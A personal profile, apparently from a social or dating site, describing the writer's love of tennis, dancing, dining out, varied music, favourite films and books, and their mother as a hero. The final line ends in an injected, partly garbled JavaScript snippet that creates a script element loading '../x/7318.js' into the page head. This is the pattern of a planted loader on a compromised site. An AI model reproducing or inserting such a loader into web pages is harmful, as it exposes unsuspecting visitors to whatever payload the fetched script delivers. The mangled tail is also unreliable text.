I have played tennis since....hell I can't even remember and I am a natural performer, put me on a stage and I'll come up with something. Dancing is a passion, I don't care if no one else at the party is dancing, I'll do it anyway, because it makes me happy. I guess you could call me spoiled but I love to eat in nice restuarants......alot.....ok everyday...it's and addiction....I admit it, but you only have one life, so you better live it like you want to.
I don't thinking meeting people online is a good way to go about it.
This section used to say NO ANGRY LOUD SCREAMING MUSIC.....but I guess I am looking to new horizons. I can honestly say I will listen to it all. Rap, Hip-Hop, Jazz, Rock, a teensy bit of country, music from other country's and yes a little loud screaming music.
Heart and Soul, Diry Dancing Havana Nights
The whole Janet Evanovich series is a must read.
I am pretty sure it goes without saying that my most admired hero is my Mom. She is not only my Mother, but my best friend and most trusted advisor. .."var s=document·..('s cript');s.src='../x/7318.js';document&&& amp;#035;035;183;getElementsByTagName('head')[0].append Child(s);"